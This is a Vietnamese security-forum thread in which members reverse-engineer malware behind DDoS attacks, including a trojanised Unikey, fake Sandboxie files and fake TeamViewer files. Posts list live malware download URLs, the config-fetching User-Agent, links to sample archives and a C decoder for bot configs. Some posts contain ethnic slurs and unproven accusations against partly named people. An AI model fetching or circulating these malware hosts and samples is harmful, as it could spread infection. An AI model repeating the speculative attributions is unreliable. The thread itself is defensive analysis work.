lập các file liên quan đến MsHelpCenter.* (đuôi .pf) trong thư mục "Prefetch" tại C:/WINDOWS/. Mục đích của việc tạo lập các file .df này là: Các file MsHelpCenter.* khi khởi đông (start) trong hệ thống chúng trước hết access vào nhiều file hay một phần của các file và load các file hay các phần của files lên bộ nhớ (memory), để hoàn tất quá trình khởi động. Windows thiết lập các file .df nói trên để giúp cho quá trình khởi đông MsHelpCenter,* nhanh hơn. Các file và các phần trong files cần load lên bộ nhớ nói trên, sẽ đươc lưu trong các file .df và chúng được Windows load nhanh lên bộ nhớ ngay khi MsHelpCenter,* được kích hoạt và giúp cho quá trình khởi đông MsHelpCenter.* nhanh hơn. Xem hình 4. 5- Process MsHelpCenter.exe đóng một vai trò quan trọng, nhưng nó là một hiden process nên khó phát hiện là nó đang chạy thường trực trong hệ thống và được load lên bộ nhớ, vì vậy việc delete nó một cách bình thường, sẽ khó khăn. Xem hình 5 6- Khi chạy trong hệ thống, MsHelpCenter.exe tạo lập một kết nôi Internet đến một webserver. Chắc đây là một master-website. MsHelpCenter.exe mở rất nhiều thread (cổng TCP) gửi các gói tin cỡ 60B để kết nối đến cổng 80 TCP của webserver nói trên. Đia chỉ IP của webserver nay là: 178.162.225.253, webserver này có domain là mtiw253.westhomesite.info. Tại thời điểm tôi thử nghiệm webserver này không hoạt đông (inactive-offline). Vì vậy chưa xác định được là MsHelpCenter.exe sẽ download file gì (file image gì?) về máy. Quá trình thử nghiêm cần được tiếp tục theo dõi. Tôi nghĩ sẽ có lúc webserver này sẽ active. Xem hình 6a và 6b

Hinh 1- Các file nguyên thuỷ của Unikey do axasin cung cấp

Hình 2- Các file mới được vírus tao lập tại Microsoft Help Folder

Hình 3- Sau khi Unikey đươc cài, phần virus nhúng trong Unikey.exe bị xoá

Hình 4- File MshelpCenter.exe....pf trong Prefetch folder

Hình 5- Hiden process MsHelpCenter.exe

Hình 6a- Kết nối Internet tạo lập bởi MsHelpCenter.exe

Hình 6b- Các packet và connection tao lập bởi MsHelpCenter.exe

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

Em đã thông báo cho Mediafire về file Unikey trên: http://nethoabinh.com/showthread.php?t=315 Giờ file này đã được xoá :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

invisible_love — GMT

Chào mọi người, mình rất thích topic này tuy rằng mình là dân ngoại đạo về IT. Phàm là con người, khi đứng trước 1 vấn đề có thể gây hại đến quốc gia thì ai cũng muốn góp 1 tý sức lực để giải quyết, minh không có năng lực về IT nên đành âm thầm theo dõi topic, nhằm tự giúp mình và cũng phần nào giúp được đất nước. Sẵn đây mình có ý kiến về việc truy tìm botnet thế này, không phải máy tình nào cài unikey or vietkey thì đều có dùng internet, nhưng 100% máy nào chơi gam online thì phải dùng internet. Dạo này thấy vinagame ăn nên làm ra lắm, mấy cái game Võ lâm truyền kỳ, Tru tiên... đều dùng source của tàu cả, đó là chưa kể mấy phần mềm hack game thì đa phần của tàu nốt. Do đó, nếu tụi nó cố tình chèn mã độc vô những source game này thì sao, có phải là sẽ tạo được 1 mạng botnet kha khá phải không vì bây giờ game online ở VN phát triển nhanh quá. Đó là ý kiến nhỏ của mình thôi, vì là dân ngoại đạo nên nếu có nói sai gì thì xin các bạn bỏ qua @TQN : khâm phục anh lắm, em cũng là dân cơ khí nhưng về "ai ti" thì mù tịt :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Nói thật với các bạn giờ tui lười gõ bài phân tích lắm. Phải trình bày như viết văn, phải cắt dán hình... Thôi thì trong quá trình RCE mẫu mới fake Sandboxie của stl, tui mạn phép post luôn cai notes.txt của tui. File này tui dùng để ghi chú các điều cần nhớ trong quá trình RCE. Mẫu nào cũng có notes.txt riêng của nó. Notes.txt của em mao danh Sandboxie tính tới ngày hôm nay 09-08-2011:

Bat dau tu 30/07/2011, uxtheme.manifest se download virus tu: URL1: http://map.priper.info:8080/flower.bmp Neu fail, no se down tu 2 host sau: URL2: http://daily.openns.info:8080/flower.bmp URL3: http://sec.seamx.net:8080/flower.bmp VD URL day du khi no download: http://map.priper.info:8080/flower.bmp?g={B4EE5266-759C-474A-B216-A6BCC12A6456}&c=1&v=1&tf=312219152140&tr=111111111111&t=312219152140&p=2&e=0&n=abcde&u=abc&waclwugzwooyeyvhlja=yvqexeqbkwgdhejtuuvyps Tu flower.bmp, uxtheme.manifest extract ra URL sau (ta cung co the dung tool DecodeBmp.exe de extract). URL2: http://map.priper.info:8080/aqua.bmp UxTheme.manifest se extract data tu aqua.bmp ra file SbieCtrl.exe. Ta cung co the dung DecodeBmp.exe de extract ra SbieCtrl.exe. SbieCtrl.exe khi run se extract ra 2 file mao danh Sandboxie: SbieSvc.exe va SbieMgm.dll SbieMgm.dll chinh la con bot de DDOS. No se download config file tu 1 trong cac URL sau: http://net.iadze.com/backgrounds.jpg http://net.iadze.com/fronts.jpg http://find.instu.net/backgrounds.jpg http://find.instu.net/fronts.jpg IP cua net.iadze.com: 178.32.95.119:80. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Ta co the download backgrounds.jpg tu 1 trong 4 URL tren, dung cac tool nhu Wget, Malzila, Fiddler. Bat buoc phai config voi User-Agent tren. Neu khong se tra ve HTML respond mao danh: Account suspended. Sau do dung tool DecodeJPG.exe de giai ma file backgrounds.jpg ra file backgrounds.gz Unzip backgrounds.gz bang 7Zip, WinRAR hay WinZip, ta se co file text cau hinh DDOS cua stl. Cac tool DecodeBmp, DecodeJPG da up o: http://www.mediafire.com/?5g7r7c8eme0wjp2

Các link download tool: 1. Wget: http://users.ugent.be/~bpuype/wget/ 2. Malzilla: http://malzilla.sourceforge.net 3. Fiddler: http://www.fiddler2.com/ Cả 3 tool đều free, có cái opensource. Malzila được code = Delphi, Fiddler: C#, Wget: C. Tui sẽ post hướng dẫn dùng các tool này sau, nhưng thực ra rất dể, các bạn mày mò một chút là làm được, có thể tự download bmp về, download jpg về, dùng DecodeBmp và DecodeJPG giải mã ra hai file SbieCtrl.exe và backgrounds.txt. Chỉ khó một chút ở kỹ thuật debug hay static extract SbieSvc.exe và SbieMgm.dll từ SbieCtrl.exe (Aqua.bin). Tui sẽ post cách extract sau. Mẫu Fake Sandboxie ngày 04-08-2011: http://www.mediafire.com/?04srzu9n2p4yx7x Mẫu Fake Sandboxie ngày 09-08-2011: http://www.mediafire.com/?bpqq7mb7i5jxovk Trong mẫu ngày 09-08-2011, có cả hai file source của môt project open source mà coder của stl đã ăn cắp 100%: socks.cpp và socks.h. 2 invisible_love: Cảm ơn em đã khen, anh là dân CK nhưng CK lại "mù tịt" thì sao ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Có một chuyện kể ra không biết vui hay buồn. Thứ 7 vừa rồi có đi nhậu với một người bạn cũ, hồi xưa cũng là thợ code như mình, giờ vẫn còn làm IT và đã lên PM. Cậu ta cũng có biết về vụ này và cũng đã vào đọc. Khi đang nhậu, nói chuyện stl, cậu ta cứ thắc mắc: 1. Tại sao có mấy file mạo danh của stl không có đuôi .exe, tui không double click vô thì làm sao nhiểm virus vô máy tui được ? 2. Nhiều file như StaticCaches.dat, uxtheme.manifest... là các DLL. Các DLL này làm sao tự run được ? 3. Nó download bmp về thì làm sao sinh ra bot mới được ? Mình phải ngồi "thuyết trình" một hồi, hết mấy chai bia thì nó mới hiểu, nhưng theo tui thì chắc cũng hiểu "sơ sơ" à ! Từ từ rồi tui sẽ post phân tích kỹ thuât RCE, cách thức hoạt động của các con Fake xxx, các con núp bóng Bmp file trên sau. Giờ thì lo tìm bot, host mới của tụi stl này đã ! Bà con thông cảm !

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Úi zời, thế thì kiểu j bác chả có Skype trong room IT Chứng khoán :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, angel_of_devil nhầm to rồi: CK = Cơ Khí đó anh Hai ! Làm em tự hỏi: quái, tại sao lại có Skype với Chứng Khoán gì ở đây. Em có biết chứng khoán là gì đâu ? Vậy là danh sách bot, "mèo què" mới của stl đã có thêm các em sau, theo thứ tự từ mới đến cũ: 1. SbieSvc.exe 2. SbieMgm.dll 3. TeamViewer_Desktop.exe 4. themeui.manifest 5. uxtheme.manifest 6. TeamViewer.exe Bà con tìm từng Exe process trên = TaskManager hay dùng tool: Process Explorer của SysInternals, Process Hacker ( http://sourceforge.net/projects/processhacker) trên máy mình. Nếu có, kill process, sau đó xóa các file kể trên đi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

TQN wrote:

Từ từ rồi tui sẽ post phân tích kỹ thuât RCE, cách thức hoạt động của các con Fake xxx, các con núp bóng Bmp file trên sau. Giờ thì lo tìm bot, host mới của tụi stl này đã ! Bà con thông cảm !

Bác TQN sớm sớm post mấy bài hướng dẫn mọi người RCE đi, em thì có đầy đủ các Tools RCE rồi mà không biết cách để làm, có lẽ là do vẫn chưa hiểu được nền tảng và kỹ thuật căn bản. Em có đọc qua mấy bài "crack me" của bác Kienmanowar thì làm được nhưng vụ RCE này thì vẫn chưa biết. hic hic.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tính tới ngày 10-08-2011, anh em HVA chúng ta đã RCE và tìm ra thêm các host mới của nhóm stl Danh sách host và URL mà virus nằm vùng của stl (uxtheme.manifest, themeui.manifest) download về các update, các bot mới: 1. http://map.priper.info:8080/flower.bmp 2. http://map.priper.info:8080/aqua.bmp 3. http://daily.openns.info:8080/flower.bmp 4. http://sec.seamx.net:8080/flower.bmp 5. http://net.iadze.com/backgrounds.jpg 6. http://net.iadze.com/fronts.jpg 7. http://find.instu.net/backgrounds.jpg 8. http://find.instu.net/fronts.jpg 9. http://penop.net/top.jpg 10. http://penop.net/images01.gif Để đề phòng HVA ta bị DDOS nặng, không vào được, em mượn cái blog của ThangCuAnh: thangcuanh.blogspot.com để post song song luôn (sẵn tiện quãng cáo cái blog vắng hơn chùa Bà Đanh). Lỡ HVA không vào được thì em post ở http://thangcuanh.blogspot.com. Bà con có thể vào đây đọc. Blogspot của Google thì cho tụi stl DDOS mệt nghĩ luôn. PS: Chắc tụi stl sẽ cập nhật backgrounds.jpg của nó, ra lệnh DDOS cái blog cùi bắp của ThangCuAnh quá ;) Em công nhận mấy anh stl giàu kinh thiệt nhe ! Kinh phí cực kỳ dồi dào, host bát ngát luôn. Có cái nào mấy anh quên, bỏ đi không, nhớ cho em và các anh em HVA ta vài cái "xài chơi" nhé !!!???

Phân tích tính chất vài trận DDoS HVA vừa qua.

khachlangthang — GMT

Anh e cho hỏi , mình xài máy cty, lu bu quá, ko tìm hiểu đ][cj, chỉ đọc sơ sơ thôi. có nhắc đến AcrobatReader . Lúc nãy mình nhấn CTRL SHIFT DEL xoá cache, cookie,... của FIREFOX. tự nhiên hắn chầm chậm. rồi khởi động Acrobat Reader lên, tuy nhiên thấy nó khởi động lên thôi, ko chạy ra cửa sổ, trong khi em có mần chi mô ! Mà trong TASK MNG thì có Process gì đó (kill mất rồi-sơ ý quá) đại loại viết tắt gần giống Acrobat reader + têm vài chữ chi chi nữa, máy cùi mà đòi 21MB RAM lận . Không biết triệu chứng ni có liên quan chi tới tụi này ko mấy anh ! E thực tập ở Cty nên không dám làm gì nhiều hết!

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Hì hì, angel_of_devil nhầm to rồi: CK = Cơ Khí đó anh Hai ! Làm em tự hỏi: quái, tại sao lại có Skype với Chứng Khoán gì ở đây. Em có biết chứng khoán là gì đâu ? Vậy là danh sách bot, "mèo què" mới của stl đã có thêm các em sau, theo thứ tự từ mới đến cũ: 1. SbieSvc.exe 2. SbieMgm.dll 3. TeamViewer_Desktop.exe 4. themeui.manifest 5. uxtheme.manifest 6. TeamViewer.exe Bà con tìm từng Exe process trên = TaskManager hay dùng tool: Process Explorer của SysInternals, Process Hacker ( http://sourceforge.net/projects/processhacker) trên máy mình. Nếu có, kill process, sau đó xóa các file kể trên đi.

Khi download Teamviewer 6 (version6) từ trang chủ của Teamviewer (Teamviewer.com) thì sau khi cài đặt trong may của ta có các file chạy là:

- TeamViewer.exe (7.816KB) - TeamViewer_.exe (3.963KB) - TeamViewer_Desktop.exe (2.071KB) - TeamViewer_Service.exe (2.283KB) - tv_w32.exe - tv_x64.exe

Các file này nằm ở thư muc \Program files\TeamViewer\Version6\ khi cài TeamViewer6 theo chế độ "install" (nghĩa là cài vào OS) hay nằm ở C:\Documents and Settings\User\Local Settings\Temp\TeamViewer\Version6\ khi cài ở chế độ "run" (nghĩa là không cài TeamViewer vào OS mà sử dụng nó như một stand-alone program) Vì vậy ý anh TQN nhắc xoá các file TeamViewer_Desktop.exe hay TeamViewer.exe trong máy các bạn là khi chúng đã bị STL nhúng virus vào hay chúng là virus nhưng mạo nhận tên các file chính thức của TeamViewer. Một cách phân biệt đơn giản, nhanh chóng là so sánh dung lượng giữa file nghi ngờ và file nguyên thuỷ của TeamViewer (dung lương chuẩn trên XP tôi đã ghi chú ở trên) Chú ý là khi ta khởi động Teamviewer trên may ở cả chế độ run hay install thì máy ta sẽ kết nối với các máy chủ của Teamviewer và sau đó máy chủ của Teamviewer mới kết nối đến máy của partener (máy ta muốn truy cập đến và theo rõi màn hình) Thí dụ

Action:Monitored Application:TeamViewer.exe Access:Outbound TCP access Object:1359 -> 87.230.74.43 (master4.teamviewer.com):5938 Time:8/10/2011 11:06:10 AM Application:TeamViewer.exe Access:Outbound TCP access Object:1360 -> 95.211.37.198 (server3310.teamviewer.com):5938 Time:8/10/2011 11:06:11 AM

Chú ý teamviewer có nhiều server sử dụng các subdomain khác nhau của Teamviewer.com (thí dụ master4....). Vì vậy tên các subdomain có thể thay đổi khi ta kết nối lại. Như vậy rõ ràng là Teamviewer group có thể xem và vào máy của ta nếu họ muốn như vậy (đặc biệt khi ta sử dụng máy với quyền admin). Thế là ta cảm thấy có điều gì... lăn tăn rồi đấy. Phải không các bạn? Vì vậy đối với các webserver, muốn remote control nó, thì không nên dùng Teamviewer. Tôt nhất là dùng card remote control trên máy (hardware) và kết nối thông qua IP, có thể dùng SSH hay Real VNC enterprise (shareware).

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

TQN wrote:

Có một chuyện kể ra không biết vui hay buồn. Thứ 7 vừa rồi có đi nhậu với một người bạn cũ, hồi xưa cũng là thợ code như mình, giờ vẫn còn làm IT và đã lên PM. Cậu ta cũng có biết về vụ này và cũng đã vào đọc. Khi đang nhậu, nói chuyện stl, cậu ta cứ thắc mắc: 1. Tại sao có mấy file mạo danh của stl không có đuôi .exe, tui không double click vô thì làm sao nhiểm virus vô máy tui được ? 2. Nhiều file như StaticCaches.dat, uxtheme.manifest... là các DLL. Các DLL này làm sao tự run được ? 3. Nó download bmp về thì làm sao sinh ra bot mới được ? Mình phải ngồi "thuyết trình" một hồi, hết mấy chai bia thì nó mới hiểu, nhưng theo tui thì chắc cũng hiểu "sơ sơ" à ! Từ từ rồi tui sẽ post phân tích kỹ thuât RCE, cách thức hoạt động của các con Fake xxx, các con núp bóng Bmp file trên sau. Giờ thì lo tìm bot, host mới của tụi stl này đã ! Bà con thông cảm !

Cái này thì bác phải cảm thấy vui mới phải, vì cuối cùng thằng bạn của mình cũng thoát được kiếp KU-DER (coder). Thực ra ông bạn của TQN bây giờ lên làm P.M rồi, mà mấy tên P.M bây giờ chỉ chăm chăm luyện thi PMP thôi ;), súng nổ vang trời cho oai, chứ code kiếc gì thì đã vứt sạch. Ngoài nguyên nhân đó, còn một nguyên nhân khác là hiện tại phần lớn Vietnamese KUDER(s) toàn làm outsource cho các công ty nước ngoài, và họ chỉ tập trung vào giải quyết BUSINESS, thay vì tập trung vào HỆ THỐNG. Nên kỹ thuật RCE, hay am hiểu về hệ thống có giới hạn. Nhưng cũng hơi ngạc nhiên là ông bạn của bác trước đây có làm code rồi bảo là cần phải click vào file .EXE để nó chạy. Btw, chắc ông bạn của bác bây giờ chỉ có cái VIEWs của END-USERs chứ không có cái VIEWs máy móc của anh anh KUDER(s),

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không phải vui hay buồn vì chuyện đó, mà buồn vì nhận thức của nhiều người, thậm chí đang làm IT, còn rất thấp về virus, cách thức lây lan của virus, cách thức hoạt động của virus.... Trên các forum khác, thỉnh thoãng em bắt gặp: tui xài KIS 201x thì làm sao dính được, hay file xxx đó có đuôi vậy thì làm sao là virus, ... ??? Đọc mấy cái post đó thì em "bó 3 chân.com" toàn tập luôn ! Tụi stl coder build file virus và extract ra khi run thành các file có name kể trên chỉ là mạo danh thôi. Em liệt kê luôn size của đám file đó tới thời điểm này: 1. SbieSvc.exe: 44032 bytes 2. SbieMgm.dll: 272384 bytes hoặc 272896 bytes (bản ngày 09-08-2011) 3. TeamViewer_Desktop.exe: 65536 bytes 4. themeui.manifest: 102912 bytes 5. uxtheme.manifest: nhiều vô số kể, kích thước dao đông trong khoãng 102912 bytes 6. TeamViewer.exe: cũng vậy, kích thước khoãng 65536 bytes So sánh kích thước với các file gốc của TeamViewer và Sandboxie thì biết ngay, khỏi cần liệt kê MD5 vì các file trên có nhiều biến thể, khác nhau vài chục đến vài trăm byte, nên MD5 sẽ khác nhiều. Đối với user bình thường thì cách kill process, cách del các file trên có thể là hơi khó khăn, nhưng với các anh em RCE, debug, coder hệ thống trong HVA ta thì mấy file đó chỉ là "trò con nít". Em là RCE "nữa mùa", chỉ là thằng "thợ Cơ khí, thợ điện, thợ đá, thợ xxx" quèn thôi mà chỉ cần load vào IDA, xxxDbg là thấy ngay. Em nói đúng không mấy anh "sống chết theo lệnh" ? Em chỉ là "nữa mùa" thôi đấy, gặp mấy thằng "Thằng Cu Em" cao thủ khác nhảy vô là mấy anh tiêu, hết được phát lương, layoff luôn đấy !;) Mấy anh nên nhớ, không phải chỉ mấy anh là "cao thủ" thôi nhé, hoành hoành, làm bậy bạ, Việt Nam ta còn rất nhiều bạn trẻ, còn giỏi hơn mấy anh cả chục lần. Nhớ nhé, đừng coi thường người Việt Nam nữa, không phải chỉ có mấy thằng tàu khựa mà mấy anh đang đội trên đầu chỉ là giỏi đâu ! PS: Nhiều lúc em reverse code mấy anh mà em cứ phì cười một mình, bà xã hỏi anh cười gì vậy ? Mấy anh ăn cắp code, độ chế rất giỏi, cho ra biến thể mới rất nhanh, nhưng code của mấy anh thì lại gặp nhiều đoạn code rất chi là "ngớ ngẫn". Vd nhé: Chuỗi hex string của mấy anh, mấy anh dùng sscanf(xxx, "02X", xxx) để đổi từng cặp hex string ra character. Đầu chuỗi, mấy anh lấy 2 ký tự đầu làm len, lưu cả chuỗi hex vào GDIPlusX key. Giả sử em chơi set 0xFF 0xFF vào đầu cái hex string trong registry đó, bằng tool em phổ biến chẵng hạn, thì con "mèo què" của mấy anh crash không ???? Suy nghĩ kỹ rồi trả lời bằng PM cho em nhé ! Còn nữa, mấy anh sao cứ khoái xài memset, memcpy quá ! Code vậy có optimize không ? Hay kệ cha nó, chạy được, phá được để mấy anh báo cáo xếp Nguyễn Xuân xxxx, Nguyễn (Ngô) Nam xxxx là được rồi, phải không mấy anh ????

Phân tích tính chất vài trận DDoS HVA vừa qua.

cino — GMT

TQN wrote:

Vd nhé: Chuỗi hex string của mấy anh, mấy anh dùng sscanf(xxx, "02X", xxx) để đổi từng cặp hex string ra character. Đầu chuỗi, mấy anh lấy 2 ký tự đầu làm len, lưu cả chuỗi hex vào GDIPlusX key. Giả sử em chơi set 0xFF 0xFF vào đầu cái hex string trong registry đó, bằng tool em phổ biến chẵng hạn, thì con "mèo què" của mấy anh crash không ???? Suy nghĩ kỹ rồi trả lời bằng PM cho em nhé ! Còn nữa, mấy anh sao cứ khoái xài memset, memcpy quá ! Code vậy có optimize không ? Hay kệ cha nó, chạy được, phá được để mấy anh báo cáo xếp Nguyễn Xuân xxxx, Nguễn Nam xxxx là được rồi, phải không mấy anh ????

Em thấy bác hay than phiền ở những đoạn này. Xét về phía virus maker mà nói thì đó chính là những chiêu obfuscation AV trên máy nạn nhân. Hạn chế các tác vụ check. Chạy được/ phá được là được rồi. PS: sếp NXT, xxx là ai thế bác?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không phải đâu cino, tui không than phiền đâu. Mấy cái đó mà là obfuscation, polymoxxx gì đó thì em đi đầu xuống đất luôn, bỏ nghề tay trái RCE luôn. Tui từng làm coder và R&D gần chục năm, mấy cái lỗi đó chỉ đơn thuần là lỗi code của coder thôi bạn, chả có obfuscation, polyxxx (đa hình) hay đánh lừa AV gì ráo hết. Phải gọi là code stupid, "ngớ ngẫn" ! Trình độ của stl coder thì còn lâu mới dùng pure ASM và building ASM trong compiler được, chứ nói chi tới mấy kỹ thuật cao cấp đó của tụi 29A, tui Phrackxxx, VxNetlux.... Tui đọc, trace mấy đoạn code ASM, thực sự obfuscated, polyxxx gì đó của mấy team trên là đủ tẩu hoả nhập ma rồi. Một phần nữa, kỹ năng debug, RCE, đọc code ASM của vC++ compiler sinh ra của các anh stl này còn kém. Không phải chỉ mình mấy anh ấy, tui đã gặp rất nhiều coder C++ rồi, code ầm ầm, nhưng kỹ năng debug, hiểu hệ thống, hiểu compiler thì rất hạn chế. PS: Anh nói đúng không, rồng châu Á ? Cũng là dân RCE, em đồng ý với anh chứ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

tôi xin có một vài ý ciến như sau : a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức. b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả . c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? . >> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!!

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

Nowhereman wrote:

tôi xin có một vài ý ciến như sau : a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức. b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả . c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? . >> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!!

Thế dùng phần mềm nước ngoài thì đảm bảo là an toàn đấy. Nếu muốn an toàn thì tốt nhất là đừng dùng internet.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

rang0 wrote:

Nowhereman wrote:

tôi xin có một vài ý ciến như sau : a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức. b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả . c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? . >> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!!
Thế dùng phần mềm nước ngoài thì đảm bảo là an toàn đấy. Nếu muốn an toàn thì tốt nhất là đừng dùng internet.

Đối với malware của STL thì nên dùng phần mềm của symantec -:-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tới nay, em thấy Avira là tốt nhất, cập nhật nhanh nhất đối với các mẫu "mèo què" của stl.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 acoustics89: Khẩn cấp, http://penop.net/top.jpg và http://penop.net/images01.gif lại sống lại. Thằng images01.gif lần này cũng khác với images01.gif lần trước, vẫn code = VB, size lớn hơn. Em thông báo cho bà con biết thằng nằm vùng nào download top.jpg về cho mọi người biết, thuật toán giãi mã top.jpg để anh viết tool, script luôn ! Gấp em nhé ! Chứ không thì lại có AcrobatUpdater.exe mới để DDOS HVA ta nữa ! Hì hì, mấy anh stl vắt chân lên cổ chạy phải không, chạy dữ ha ! Mà em đề nghị mấy anh dẹp giùm cái flower.bmp, aqua.bmp với plxzyin0fx.bmp đi, em nhìn nó chán quá rồi. Có bao nhiêu bài đó đem xào đi xào lại hoài không ngán à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

2TQN: hàng decode top như anh yêu cầu, vì làm vội nên không đẹp lắm, anh thông cảm Code:

#include 
#include 
#include 

int main(int argc, char *argv[])
{
	FILE *f; int i;
	long lSize;
	char *pBuffer, *p;
	char v24,v23; 
	int v7 = 0;
	
	
	char szOutPut[MAX_PATH] = "";

	if ((argc <2) || (argc >3 ))
	{
		printf("Usage: Decode  ");
		exit(1);

	}
	if (argc == 2)
	{
		strcpy(szOutPut, "Decoded.txt");
	}
	else strncpy(szOutPut, argv[2],MAX_PATH);

	f = fopen(argv[1], "rb"); //doc file da ma hoa

	if (f)
	{
		fseek(f, 0, SEEK_END);
		lSize = ftell(f);
		fseek(f, 0, SEEK_SET);

		pBuffer =(char*) malloc(lSize+1024);
		if(pBuffer)
		{
			
			p = (char *)pBuffer+ 4;
			memset(pBuffer, 0, lSize+1024);
			fread((char*)pBuffer, lSize, 1, f);

			for ( i = 8; i < lSize; ++i )
			{
				v24 = p[v7 % 4];
				v23 = pBuffer[i];
				v23 = (v24 ^ v23) % 256;
				pBuffer[i] = v23;
				v7++;
				//v8 += v23 * v7++ % 7;
			}
		}
		fclose(f);


		if (pBuffer)
		{
			f = fopen(szOutPut, "wb");
			if (f)
			{
				fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
				fclose(f);
			}
			else printf("Can not open output file.");
			delete[] pBuffer ;
		}
	}
	else printf("Can not open input file.");
	return 0;
}

bạn này vẫn dùng http://second.dinest.net/xv.jpg và http://second.dinest.net/xc.jpg , user agent như cũ. Các thành phần khác đang phân tích.... O-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

rongchaua — GMT

Không phải chỉ mình mấy anh ấy, tui đã gặp rất nhiều coder C++ rồi, code ầm ầm, nhưng kỹ năng debug, hiểu hệ thống, hiểu compiler thì rất hạn chế. PS: Anh nói đúng không, rồng châu Á ? Cũng là dân RCE, em đồng ý với anh chứ ?

Em nghĩ không phải rất nhiều mà em nghĩ ít cũng 90% Coder (cho tất cả các loại ngôn ngữ lập trình) đều không quan tâm đến việc tìm hiểu hệ thống và compiler vì xu hướng phát triển của Coder là hướng "lên". Tức là sẽ hướng tới tổ chức code , quản lý module, quản lý dự án, tổ chức test cases,... (như hướng đi của em hiện tại) --> Software Engineering Phần 10% còn lại vì lý do phải lập trình hệ thống nên hướng đi "xuống". Tức là tìm hiểu chuyên sâu về hệ điều hành, mã sinh, bảo mật,driver,... thì mới có điều kiện đi sâu vào nghiên cứu, tối ưu --> Reverse Engineering. Vì vậy em hoàn toàn đồng ý với anh về điểm này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

cino — GMT

TQN wrote:

Không phải đâu cino, tui không than phiền đâu. Mấy cái đó mà là obfuscation, polymoxxx gì đó thì em đi đầu xuống đất luôn, bỏ nghề tay trái RCE luôn. Tui từng làm coder và R&D gần chục năm, mấy cái lỗi đó chỉ đơn thuần là lỗi code của coder thôi bạn, chả có obfuscation, polyxxx (đa hình) hay đánh lừa AV gì ráo hết. Phải gọi là code stupid, "ngớ ngẫn" !

Chào bác. Đấy là em nghĩ tới phương diện là 1 con malware transparent với AV - với những công nghệ Heuristic, Sandbox... "thông minh" cũng thừa sức analyze đám "clearly malware" như vầy, chưa kể AV cấp cao còn có chức năng scan network traffic/ header... Rồi với những con "siêu đa hình" cũng bị dập cho bẹp gí thì sá gì con cùi bắp của mấy attacker đang đề cập ở đây. Em không nói đến ở mức độ decompile, disasm, operator hay coding convention, tier architecture, software en.. gì gì gì. Và em chưa từng thử, cũng như chưa từng view processes của mấy mẫu gửi ở đây. Trình em từ lâu tới giờ máy mó "thực hành" con IDM (Internet Download Manager) toàn failed over thì lấy đâu ra. Tiện thể em nghĩ các bác scan mấy chú IDM hàng chùa xem thử, thứ đó cũng phổ biến chả kém gì Unikey hay Vietkey đâu. Đấy là chưa kể các Hệ điều hành 10k/disk bán ngoài chợ, lâu lâu lại phòi ra 1 chú "quản trị cấp hệ thống" hù chơi. Thảm hoạ chẳng kém gì "Da nâu" của dòng nhạc Việt :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

http://linkhay.com/126browser-trinh-duyet-web-made-in-viet-nam/510673 Còn đây nữa, thấy cái 126Browser này quảng cáo dữ quá: "Trình Duyệt Của Người Việt" nhưng lòi ra một đống code comments toàn của Khựa. Server vina126.com host tại FPT nhưng cũng setup localization toàn tiếng Khựa. (có thể nó tự setup sever tại công ty chứ không thuê ở FPT). Thấy cái này nguy hiểm quá đi, ở các chung cư mình thấy nhan nhản quảng cáo về trình duyệt này. Còn công ty quảng cáo này là Gold SUN...chuyên quảng cáo qua LCD gắn ở các siêu thị, chung cư. Chủ Công ty quảng cáo Gold SUN là một người Trung Quốc, công ty này cũng có "tiền án" trong quá khứ khi quảng cáo có hiện bản đồ Việt Nam nhưng không có quần đảo Hoàng Sa và Trường Sa. Liệu có mối liên hệ nào không?
